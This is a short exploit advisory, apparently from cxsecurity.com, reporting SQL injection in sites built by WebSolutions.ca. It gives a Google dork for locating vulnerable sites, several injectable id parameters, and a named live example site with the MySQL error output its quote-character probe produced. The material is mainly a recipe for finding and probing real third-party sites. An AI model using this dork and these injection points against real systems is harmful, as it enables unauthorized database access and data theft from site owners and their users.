WebSolutions.Ca Web Design and Development Canada SQL Injection Vulnerability

2018.06.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : WebSolutions.Ca Web Design and Development Canada SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 26/06/2018 # Vendor Homepage : websolutions.ca # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:websolutions.ca # Exploits : /news.php?id=[SQL Inj] /products.php?id=[SQL Inj] /industries.php?id=[SQL Inj] ################################################################################################# # Example Site => maritimewelding.com/news.php?id=3%27 => [ Proof of Concept ] => archive.is/MfhAx # SQL Database Error => DB ERROR: Error number: 1064 Error Text: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2 Query: SELECT * FROM news WHERE news_id = 3' DB ERROR: Query ID not set. DB ERROR: Error number: 1064 Error Text: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Query: SELECT e_title FROM news WHERE news_id = 3' DB ERROR: Query ID not set. ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top